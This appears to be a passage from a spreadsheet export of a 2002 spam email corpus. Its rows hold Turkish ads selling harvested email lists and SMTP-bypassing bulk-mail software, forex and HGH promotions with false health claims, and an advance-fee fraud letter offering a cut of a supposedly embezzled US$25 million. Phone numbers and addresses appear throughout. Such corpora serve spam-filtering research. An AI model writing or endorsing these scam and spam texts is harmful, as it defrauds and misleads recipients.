\n  =3Cfont face=3DVerdana size=3D=222=22=3EArama Motoruna =3Cb=3E=3Cfont color=3D=22#FF0000=22=3E =3Cu=3E=FCcretsiz=3C=2Fu=3E=3C=2Ffont=3E=3C=2Fb=3E kay=FDt \n  imkan=FD=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E** SINIRSIZ telefon=2C e-mail ve icq ile \n            destek garantisi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 8=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E400=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E6=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 7=2E0=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E4=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22 bgcolor=3D=22#FFFF00=22=3E\n            =3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3E250=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E000=2E000 Firma bazl=FD e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EWorld Rehber 2=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E=3Cp style=3D=22margin-left=3A -6=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            150=2E000=2E000 yabanci e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EICQ Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E150=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E500=2E000 T=FCrk ICQ kullan=FDc=FDsi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ESanayi Rehberi=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E50=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ET=FCrkiye deki t=FCm firmalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=221=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* TR ve WORLD Rehber birlikte \n            aldiginizda Hotmail Kullanici listesini =3Cu=3E=3Cfont color=3D=22#FF0000=22=3E\n            =3Cb=3EHEDiYE=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E ediyoruz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* Eski m=FCsterilerimize %50 indirimimiz \n            devam etmektedir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont size=3D=221=22 face=3D=22Verdana=22=3E* Not=3A Fiyatlara KDV ve Kargo =FCcreti \n            dahil edilmemi=FEtir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n        =3C=2Ftable=3E\n        =3C=2Fcenter=3E\n      =3C=2Fdiv=3E\n&amp;nbsp=3B=3C=2Ftd=3E\n      =3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E\n    =3Cfont face=3DVerdana color=3D=22#FFFFFF=22=3E =3Cspan style=3D=22background-color=3A #FF0000=22=3E\n      =3Cfont size=3D=222=22=3ETR 8=2E0 ve World Rehber birlikte sadece 750=2E000=2E000 TL=2EYerine =3C=2Ffont=3E\n      600=2E000=2E000 TL=2E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E\n=3C=2Fdiv=3E\n=3Cdiv align=3Dcenter=3E=3Ccenter=3E\n  =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D149 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E\n    =3Cp align=3Dleft=3E&amp;nbsp=3B=3Cul style=3D=22margin-top=3A -8=22=3E\n      =3Cli style=3D=22line-height=3A 100%=22=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E =3Cfont face=3DVerdana size=3D1=3EG=FCncelleme islemlerinde \n      ki indirim oran=FDm=FDz %50'dir=2E =3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Dleft style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E =3Cfont face=3DVerdana size=3D2 color=3D=22#FF0000=22=3E\n      800=2E000 Arama motoruna kayit islemi 30=2E000=2E000TL + KDV =3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1 color=3D=22#000000=22=3ET=FCm \n      versiyonlarimizda g=F6nderim islemi icin gerekli ve en kullanisli programlar \n      bulunmaktadir=2E=3C=2Ffont=3E=3Cfont face=3DVerdana size=3D1=3E Bu programlarin video \n      formatinda aciklamalari da CD'ler icerisinde bulunmaktadir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar sizin \n      iletilerinizi kolay bir sekilde g=F6ndermenizi saglarken=2C iletilerinizi \n      alan kisilerin kullandigi serverlarin da yorulmamasini=28karsi tarafta problem \n      yaratilmamasini=29 saglayacaktir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar ISP yada hosting firmanizin \n      SMTP serverini kullanmaniza gerek kalmadan direkt g=F6nderim yapabilmenizi \n      saglayacaktir=2E isterseniz bir checkbox'i isaretliyerek kullanmak \n      istediginiz SMTP server ile&amp;nbsp=3B fault-tolerance yaparak g=F6nderdiginiz \n      iletilerin %100 yerine ulasmasini saglayabilirsiniz=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ESMTP server kullanmadan g=F6nderdiginiz \n      mesajlar bilinenin aksine daha basarili g=F6nderim yapacakdir=2E C=FCnk=FC \n      mesajlarin yerine ulasip ulasmadigini g=F6r=FCp m=FCdahele yapmak sizin elinizde \n      olacaktir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EAyrica bu programlar HTML formatinda \n      mesaj g=F6nderimini de desteklemektedir=2E Bu destek sayesinde renkli=2C resimli \n      daha g=F6rsel ve dikkat cekici iletiler g=F6nderebilirsiniz=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1=3ECD icerisindeki b=FCy=FCk e-mail \n      listelerini kolayca d=FCzenleyebileceginiz=2C istenmeyen e-mail adreslerini \n      otomatik olarak silebileceginiz ve her t=FCrl=FC kategoriye ayirabileceginiz \n      programlar da =FCcretsiz olarak verilmektedir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ETR rehber ve World \n      Rehberi birlikte aldiginizda=2C bir sonraki g=FCncel versiyonlari adresinize \n      =FCcretsiz g=F6nderiyoruz=2E=2E=2E Bunun icin l=FCtfen g=FCncelleme maili aldiginizda \n      bize geri d=F6n=FCn=FCz=2E=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n    =3C=2Ful=3E\n    =3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E\n    =3Cp align=3D=22center=22=3E=3Cfont face=3DVerdana=3E=3Cb=3E=2E=3A=3A \n  HEDEF KiTLE TESPiDi =3A=3A=2E=3Cbr=3E=3C=2Fb=3E=3Ci=3E=3Cfont size=3D=222=22=3EHedef kitlenize ulasmanizi sa=F0layaci=F0imiz bu \n    =F6zel y=F6ntem hakkinda mutlaka bilgi isteyiniz=2E=2E=3Cbr=3E\n    =3C=2Ffont=3E=3C=2Fi=3E\n  =3Cb=3E=2E=3A=3A TARGET MAILLING =3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E=3Cdiv align=3Dcenter=3E=3Ccenter=3E\n  =3Ctable border=3D1 cellpadding=3D2 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber3 height=3D131 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n    =3Ctd width=3D607 height=3D20 bgcolor=3D=22#00FFFF=22=3E\n  =3Cp align=3D=22center=22=3E=3Cu=3E=3Cb=3Eiletisim Bilgileri =3A =28 Pazar haric herg=FCn 09=3A00 ile 19=3A30 arasi=29=3C=2Fb=3E=3C=2Fu=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D607 height=3D52=3E=3Cp align=3Dcenter=3E=3Cfont face=3DVerdana size=3D=224=22=3E\n      =3Cspan style=3D=22background-color=3A #FF0000=22=3EGSM=3A+ 90 535 482=2E97=2E19&amp;nbsp=3B G=F6khan \n      ATASOY=3Cbr=3E\n      =3Cfont color=3D=22#FFFF00=22=3E\n      =3Cmarquee width=3D=22386=22=3ETAKLiTLERiMiZDEN SAKININ=2C GARANTiSi OLMAYAN =FCR=FCNLER=2C HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D607 height=3D109=3E=3Cp align=3Dcenter=3E=3Cb=3E =3Cfont face=3D=22Verdana=2C Arial=2C Helvetica=2C sans-serif=22 color=3D=22#FF0000=22=3E&amp;nbsp=3BG=FCn=FCm=FCz \n  T=FCrkiye'sinde internet \n  araciligiyla yapilan reklamlar hizla artmaktadir=2E T=FCrkiye'de ve d=FCnyada bircok \n  firma bu y=F6ntemlerle kendini tanitmaktadir=2EBu artisin icinde sizin de yeralmaniz \n  kacinilmaz bir gercek olacaktir=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D607 height=3D1=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E\n      &amp;nbsp=3Blistelerden cikmak istiyorsaniz =3C=2Ffont=3E=3Cb=3E\n      =3Ca href=3D=22mailto=3Auyeiptal=40gmx=2Enet=22=3Euyeiptal=40gmx=2Enet=3C=2Fa=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 color=3D=22#ffffff=22 size=3D=222=22=3E=3Cb=3E&amp;nbsp=3B\n      =3C=2Fb=3E=3C=2Ffont=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3Eadresine bo=FE bir mail g=F6ndermeniz yeterli olacakd=FDr=2E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E\n=3C=2Fbody=3E=3C=2Fhtml=3E\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSitescooper-talk mailing list\nSitescooper-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5466</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: support@nipponforex.com\nDate: Wed, 24 Jul 2002 15:54:49 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:54:49 -0700</t>
  </si>
  <si>
    <t>support@nipponforex.com</t>
  </si>
  <si>
    <t>cpunks@minder.net</t>
  </si>
  <si>
    <t>Trading for a living (All you should know about FOREX)</t>
  </si>
  <si>
    <t>To stop receiving Nippon Forex Info news, click on the following link. .   ---   =09  =09  | ![3D""](3D"ht=) | ![3D""](3D"[URL]http://www.nipponforex.com[/URL] |   ---|---|---   |  We are beginning to realize that with the advancement in technology= ,   increased phone services, computers, fax machines, email and high-speed = Internet,   we do not need to be in an office environment in order to access the mar= ketplace.   There is GREAT MONEY to be made right from the comfort of our HOMES.   =   =20 There is no greater natural attraction for international engagement in in= vestments   than in the world=92s largest and most efficient market =96 Foreign Excha= nge Market (Forex).      =20 It doesn=92t matter whether you have any trading experience or not.   =20 You can participate in the largest market today and make a GOOD LIVING.=20 =20 Nippon Forex ( [URL]www.nipponforex.com[/URL] ) provides full service trading in the Forex Market,   includes commission free on-line trading, free charts, news and analysis,=      =20 =20   * 4 pips spread (!!!)      =20   * Inn= ovative Micro Account. Designed to accommodate traders who wish to ri= sk smaller amounts with the same automatic execution of their orders as i= n the other accounts.      =20   * FRE= E state of the art =93N-Forex=94 software =20 download it now and see for yourself how easy it is to use.        * FRE= E demo Account=20 with real-time prices, free charts and technical analysis tools.=20 =20  Learn the secrets of successful trading. FREE Forex Online Manual   =20 =20 offers the best answers to typical questions such as why you should trade= currencies,   =20 who the players are, how you can forecast currency behavior and much more= !      =20 =20 You have nothing to lose, so give try it and start   =20 making your life better, easier and a lot more fun!   =20 For additional questions feel free to contact us at info@nipponforex.com.      =20 This email is sent in compliance with strict anti-abuse and No SPAM regul= ations.   =20 Thank you for your time.      =20 Best regards,   senior project manager   John Bern   E-mail: info@nipponforex.com&lt;= br&gt;=20 Website: [URL]www.nipponforex.com[/URL]   ---      ![3D""](3D"[URL]http://www.nipponforex.com[/URL]      =09 =09 =09 =09   (C)Copyright 2002 Nippon Forex. All rights reserved.   This email is sent in compliance with strict anti-abuse and No SPAM regul= ations.   =20 To stop receiving email from Nippon Forex click on=20 this link ![3D"The](3D"[URL]http://www.adtrader.com[/URL]   ![3D"The](3D"[URL]http://www.adtrader.com[/URL]")=      ![3D""](3D"http://l=)   ![3D""](3D=)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http://www.nipponforex.com www.nipponforex.com www.nipponforex.com http://www.nipponforex.com http://www.adtrader.com http://www.adtrader.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5489</t>
  </si>
  <si>
    <t>To: &lt;ja.steffens@att.net&gt;, &lt;lynn.dietz@midrange.com&gt;, &lt;kanda_yoshimi@att.net&gt;,\nFrom: "Best HGH Int" &lt;intetllco4124@flashmail.com&gt;\nDate: Wed, 24 Jul 2002 15:31:52 -1900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:31:52 -1900</t>
  </si>
  <si>
    <t>"Best HGH Int" &lt;intetllco4124@flashmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;ja.steffens@att.net&gt;, &lt;lynn.dietz@midrange.com&gt;, &lt;kanda_yoshimi@att.net&gt;,</t>
  </si>
  <si>
    <t>EASILY Lose Weight / Build Muscle / Reverse Aging!21231</t>
  </si>
  <si>
    <t>![](3D"[URL]http://www.quality-hgh.com[/URL]  \n---  \n**A= s seen on NBC, CBS, CNN, and Oprah!**\n\n**Would you like to lose weight = while you sleep?**  \nNo dieting!  \nNo hunger pains!  \nNo Cravings!  \nNo strenuous exercise!  \nChange your life forever!  \n100% GUARANTEED!\n\n[URL]www.Quality-HGH.com[/URL]\n\n* * *\n\n* Body Fat Loss 82% im= provement.  \n* Wrinkle Reduction 61% improvement.  \n* Energy Level 84% improvement.  \n* Muscle Strength 88% improvement.  \n* Sexual Potency 75% improvement.  \n* Emotional Stability 67% improvement.  \n* Memory 62% improvement.\n\n[URL]www.Quality-HGH.com[/URL]  \n  \n\n\n\n\n\n\n\n\n**HOW TO UNSUBSCRIBE:  **  \nYou received this e-mail because you are registered at one of our Web site= s,\nor on one of our partners' sites.  \nIf you do not want to receive partner e-mail offers, or any email marketi= ng\nfrom us please  click here.  \n\nlindacucme@att.net\n\n</t>
  </si>
  <si>
    <t>http://www.quality-hgh.com www.Quality-HGH.com www.Quality-HGH.com</t>
  </si>
  <si>
    <t>5445</t>
  </si>
  <si>
    <t>To: infoeurope@lycos.com\nFrom: "europe info" &lt;infoeurope@lycos.com&gt;\nDate: Wed, 24 Jul 2002 15:02:49 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:02:49 +0100</t>
  </si>
  <si>
    <t>"europe info" &lt;infoeurope@lycos.com&gt;</t>
  </si>
  <si>
    <t>infoeurope@lycos.com</t>
  </si>
  <si>
    <t>PARTNERSHIP.</t>
  </si>
  <si>
    <t>FROM:ZIMMY MABO.\nTEL:0031-623-787-971.                   \nE-MAIL:infoeurope@lycos.com.\nTHE NEDERLANDS.\n\n\n         SOLICITING FOR A BUSINESS VENTURE AND PARTNERSHIP\n\nBefore I proceed.Am greatful to introduce my self, My name is MR ZIMMY MABO a zimbabwean.I was formaly a personal aid to PRESIDENT ROBERT MUGABE,Due to my position and closeness with the President. I absconded with sum of TWENTY FIVE MILLION UNITED STATES DOLLARS (US$25,000,000)Which was part of the money meant for campaigning for president Robert Mugabe's re- election into office under Zaunpe party.Presently I have been able to move the funds diplomatically to a security company in the Netherlands. \n\nMY REQUEST:I am looking for a trustworthy individual or firm to advice me in the right investment as well as to provide account where the funds will be lodge into.Moreso,I am interested in buying propertys for residence as my family will be residing there in the near future.\n\nCOMMISSION AND REMUNERATION:As regards your commission and remuneration,I have decided to offer you 25% and also 5% for all your expenses(telephone bills, travelling expenses, hotel bills and other expenses incurred).\n\nNOTE: I shall commit half of my own share of the total sum into a joint venture project preferably in the purchace of real estates or other profitable business venture ,Be rest assured that you stand no risk of any kind as the funds inquestion belong to me alone, As soon as I get your conset ,I will furnish you with the details and contact of the security company where I have the funds deposited.I strongly believe that associating with you to embark on this and other business ventures will derive a huge success hereafter and it will be a long lasting business association.\n\n\n YOURS TRULY,\n MR.ZIMMY MABO.\n\n\n_____________________________________________________\nSupercharge your e-mail with a 25MB Inbox, POP3 Access, No Ads\nand NoTaglines --&gt; LYCOS MAIL PLUS.\n[URL]http://www.mail.lycos.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mail.lycos.com</t>
  </si>
  <si>
    <t>5446</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: ankara@dunyagazetesi.com.tr\nDate: Wed, 24 Jul 2002 14:09:44</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:09:44</t>
  </si>
  <si>
    <t>ankara@dunyagazetesi.com.tr</t>
  </si>
  <si>
    <t>Kime Oy Vereceksiniz ?</t>
  </si>
  <si>
    <t>=DDyi g=FCnler\n\n=20\nD=DCNYA Gazetesi, i=E7inde bulundu=F0umuz siyasi karma=FEa d=F6neminin se=\n=E7imler sonras=FDnda nas=FDl bir hal alaca=F0=FD konusunda kapsaml=FD bi=\nr ara=FEt=FDrma yapmaktad=FDr. Bu =E7er=E7evede toplumumuzun m=FCmk=FCn o=\nldu=F0unca geni=FE bir kesiminin g=F6r=FC=FElerine ba=FEvurmay=FD gerekli=\n g=F6rd=FCk.=20\n\n=20\n3 Kas=FDm 2002 tarihinde yap=FDlmas=FD =F6ng=F6r=FClen se=E7imler sonras=FD=\nnda siyasi belirsizli=F0in, dolay=FDs=FDyla da ekonomik belirsizli=F0in s=\nona erip ermeyece=F0i y=F6n=FCnde bir tahmin yapmam=FDz ve bu konuda kamu=\noyunu bilgilendirmemiz gerekti=F0ini d=FC=FE=FCn=FCyoruz. Sizin de g=F6r=FC=\n=FElerinizi bize iletmeniz anketin sa=F0l=FDkl=FD olmas=FD =E7er=E7evesin=\nde =F6nem ta=FE=FDmaktad=FDr.=20\n\n=20\nD=DCNYA Gazetesi, anketi cevaplayanlar=FDn kimlikleri konusunda herhangi =\nbir a=E7=FDklaman=FDn yap=FDlmayaca=F0=FD, sadece cevaplar=FDn=FDn dikkat=\ne al=FDnaca=F0=FD y=F6n=FCnde tam garanti verir. =DDlginiz i=E7in te=FEek=\nk=FCr eder, =E7al=FD=FEmalar=FDn=FDzda ba=FEar=FDlar dileriz.\n\n=20\nAnketin , daha geni=FE kapsaml=FD olmasi ve b=FCy=FCk kitlelere ula=FEabi=\nlmesi i=E7in ,\n\nTan=FDd=FDklar=FDn=FDza bu mail=92i g=F6nderebilirsiniz .\n\n=20\n\nSoru 1\n\n=20\n\nSe=E7imde hangi partiye oy vermeyi d=FC=FE=FCn=FCyorsunuz?\n\n=20\n\n=20\n\n=20\n\nSoru 2\n\nSizce se=E7imlerde en =E7ok oyu hangi partiler alacak, bir s=FDralama yap=\nabilir misiniz?\n\n=20\n\n=20\n\n=20\n\nSoru 3\n\nSe=E7imlerin sonucunu etkileyebilecek temel geli=FEmeler ne olabilir?\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\nD=DCNYA GAZETES=DD ANKARA TEMS=DDLC=DDL=DD=D0=DD\n\nTel: 312 446 99 24\n\nFax: 446 91 54\n\nankara@dunyagazetesi.com.tr\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\n\n=20\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441</t>
  </si>
  <si>
    <t>To: "Friend" &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Only the Best" &lt;OnlyTheBest_______r-7552100-342@mm53.com&gt;\nDate: Wed, 24 Jul 2002 12:55:18 UT</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:55:18 UT</t>
  </si>
  <si>
    <t>"Only the Best" &lt;OnlyTheBest_______r-7552100-342@mm53.com&gt;</t>
  </si>
  <si>
    <t>"Friend" &lt;cypherpunks@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>Friend, Companies are giving away FREE CARS!</t>
  </si>
  <si>
    <t>Remove yourself from this recurring list by: Clicking here to send a blank email to unsub-7552100-342@mm53.com OR Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063 This message was sent to address cypherpunks@einstein.ssz.com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459</t>
  </si>
  <si>
    <t>To: AOL.Users@einstein.ssz.com\nFrom: latest7567h44@yahoo.com\nDate: Wed, 24 Jul 2002 11:15:29 -0900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:15:29 -0900</t>
  </si>
  <si>
    <t>latest7567h44@yahoo.com</t>
  </si>
  <si>
    <t>AOL.Users@einstein.ssz.com</t>
  </si>
  <si>
    <t>Long distance                                   1335Pv-6</t>
  </si>
  <si>
    <t>Hi:  Have    you been paying too much for your home or   business long distance? Have    you been looking for an affordable but honest   long distance alternative? We are offering    Fiber optic Long distance for   as low as $9.95 per month! Email    us with your phone number and we'll call you   back so you can hear how great the connection is.   Six plans to choose from including a travel plan.  There are no credit checks and because you don't    need to change your long distance carrier, your    service can be turned on in just a few hours.    Distributors needed!  We have distributors now making a few hundred to    many thousands of dollars per month from the comfort    of their homes.    Obtain complete    details Include your phone number- we'll   call you back to confirm our crisp clear connection.   To be removed: click here 9954ceKz6-102mjlg8918qBcR4-723lUuX3399cRNs0-338xWys4979yobM4-873gAkQ5719cl69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415</t>
  </si>
  <si>
    <t>To: &lt;cpunks@minder.net&gt;\nFrom: "MLM Insider Forum" &lt;mlm3leads4u@amuro.net&gt;\nDate: Wed, 24 Jul 2002 11:05:59 +1200</t>
  </si>
  <si>
